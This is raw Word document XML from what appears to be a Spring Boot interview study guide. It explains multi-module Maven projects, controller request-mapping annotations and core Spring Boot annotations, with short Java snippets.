          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676CB53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507169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Dependencies for module-api --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0C89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F7D5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75978EA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5247CF9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7F2CB1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2866DE6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D6F82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imilarly, create module-service, module-data, and module-web submodules, adjusting the artifactId for each module and adding specific dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E54AEA"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Module-specific Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77AF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API</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the REST API layer (Controllers, DTOs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568825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Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the service layer, business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BCB8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Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the data access layer, repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055CB38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Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains configurations and application entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060B4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for a simple </w:t>
      </w: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n module-api:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290276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5E9A1C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593B74A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8F738F5" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F50E6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DA29C6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MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62573013" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DC31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greet")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B558B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reet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274803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yService.getGreeting();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68A4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B81D4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D2EA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of </w:t>
      </w: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n module-service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C795A3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768747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EBF76BA" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523AA6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Greeting() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02CF7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the Service Layer!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE05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94A0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DA0EB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Enable Spring Boot Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057476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one of the submodules (usually module-web), define the @SpringBootApplication class, which is the entry point to your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60041FA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in module-web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193ECE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991D60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lication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACCFF80" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7572780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372F2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Application.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDBF82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CBD14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2853D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unning the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425C1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fter defining the modules, you can run the application either as a whole or by running individual modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A21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the parent project</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The parent project will build and package the entire application with all submodules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692CA3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specific modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also run each module individually by navigating to the module folder and running the application directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707ACA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terminal, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2316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   # Build the entire project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEE34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spring-boot:run  # Run the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449151D0"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aging Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC758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that the modules depend on each other as needed. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11367C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web can depend on module-service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259427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service can depend on module-api.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6557148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api may not depend on anything else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCA9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can be managed by adding them in the pom.xml files under the &lt;dependencies&gt; section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3A29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4411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By using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-module Maven project</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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518" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="738F8C7E" w14:textId="659460AB" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD4F70">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="595" w:name="_Toc197867809"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are all methods present in the controller</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="595"/>
    </w:p>
    <w:p w14:paraId="6616C488" w14:textId="0517702D"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 Spring MVC controller, there are various methods you can define to handle HTTP requests. These methods are annotated with Spring annotations that define how the request is mapped to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E79BD"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mmon Methods in a Spring MVC Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191103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w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The most general annotation for mapping HTTP requests to handler methods of MVC and REST controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE51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C377C3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home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A541C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home() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D9CD4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ome";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A60AE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FCB9B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handle all HTTP methods (GET, POST, PUT, DELETE, etc.). However, to be more specific, other annotations are often used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CD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etMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.GET). It maps HTTP GET requests to the handler method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1B85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4FAA87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etUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1CDD0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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158378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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057E62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72630F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This is a shorthand for @RequestMapping(method = RequestMethod.POST). It maps HTTP POST requests to the handler method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31BE7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26588D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createUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E97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createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0852D0E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ave user logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C249BD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C296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4C3BC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tMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.PUT). It maps HTTP PUT requests to the handler method, typically used for updating resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509E8E2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DC0128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tMapping("/updateUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C92E2B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RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A113A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Update user logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE82F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF218B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ABE5B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Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.DELETE). It maps HTTP DELETE requests to the handler method, typically used for deleting resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A97D21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6413A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leteMapping("/deleteUser/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351B55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deleteUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6D11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Delete user logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0AE0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07105B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88462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chMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.PATCH). It is used for making partial updates to a resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF911D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D2E2D0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tchMapping("/updateUserPartial/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F812A9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Partial(@PathVariable Long id, @RequestBody Map&lt;String, String&gt; updates) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A921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tial update logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD3EDB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partially updated";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3952C85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7DC830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dditional Methods and Annotations in a Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C749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To extract query parameters from the request URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30DF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FFFEE1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search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ECB7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earch(@RequestParam String query) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF800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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF351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23424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hVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To extract variables from the URL path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45641DC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CD6A61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41AEC1E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ById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851BD4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with id " + id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7C22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A415A0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To bind the body of the request to a method parameter (usually for POST, PUT, or PATCH requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4828311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8EFF1B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addUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381888F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addUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C42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add the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A9AEB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added";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0A31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D9C449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r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to send the response body directly (e.g., returning JSON data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F008CB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323B23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0B777D3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Body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C173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PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E2FD6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332002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E11DC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ttribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to bind a method parameter or a method return value to a named model attribute, which will then be available for the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E52E6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56ED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elAttribute("user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEBBE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user() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103DFC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAD4B5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30CF6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p>
    <w:p w14:paraId="5E90969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form")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE6E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howForm() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35000BD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Form";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1FB6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BA6C4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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To extract specific HTTP request headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D169D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7D7314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headerInfo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A63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HeaderInfo(@RequestHeader("User-Agent") String userAgent) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29184F9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Agent: " + userAgent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B213C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AD441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turn Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819B97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ring</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the return type is a string, it typically refers to the name of the view to be rendered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DECC9E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ndView</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can return ModelAndView to specify the view and model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B255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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For REST APIs, returning an object will automatically be serialized to JSON or XML based on the content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A48D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41C8693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7823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5BFB1B52" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B53F8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id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61B2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User getUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12121C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fetch user by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD49FB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06FF54D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C65B803" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3550F5A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DECC1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createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED140B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create user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAD347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 " + user.getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC21CF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DEB707" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B206C5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tMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E86B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updateUser(@PathVariable Long id, @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CC0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update user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F70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 " + user.getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED119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EC83D12" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DB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leteMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639607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deleteUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9FC18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delete user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0AE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 with id: " + id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D404E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4CDEC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B03A76F"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263B111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519" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39387F14" w14:textId="3E39294C" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="004976B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="596" w:name="_Toc197867810"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain annotations in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="596"/>
    </w:p>
    <w:p w14:paraId="423DF925" w14:textId="4DEF57C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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478C2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the main annotation used to mark a class as a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C652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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It combines @Configuration, @EnableAutoConfiguration, and @ComponentScan annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62EE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placed on the main class to enable Spring Boot's auto-configuration and component scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246EB7D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468E5B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5E5A80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108E6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5D8111D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B96AA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DE2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onfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2F65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the class as a source of bean definitions for the application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA028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It is used to define beans using methods annotated with @Bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5445C8A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143035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1870AB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355F4F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MyService myService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246BF91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5D40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FECB2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697A0A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Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB1F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ells Spring to scan the specified package for components, configurations, and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A069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This is usually used with @SpringBootApplication to automatically detect components within the application’s package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CBA7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D37A4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2007D6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67ADA6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0BD924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244950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B9105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58EAB3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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C4C2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define a RESTful web service controller. It is a combination of @Controller and @ResponseBody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731169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annotation is used to mark a class as a controller that handles HTTP requests and automatically converts return values into JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E027F2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D5BC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629D70A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hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6CC1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ayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33018FD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8D9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EBD7A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61894B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RequestMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680D3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ps HTTP requests to handler methods of MVC and REST controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8070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an be used with various HTTP methods (GET, POST, PUT, DELETE, etc.), or as a generic mapping to all request types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359B6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3BF9A1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Api() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28869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I Response";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED2B1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DF6F9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GetMapping, @PostMapping, etc., as more specific alternatives to @RequestMapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC8668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GetMapping, @PostMapping, @PutMapping, @DeleteMapping, @PatchMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11C96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horthand annotations for HTTP GET, POST, PUT, DELETE, and PATCH requests respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168E4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ese annotations are more specific versions of @RequestMapping for specific HTTP methods.</w:t>
      </w:r>
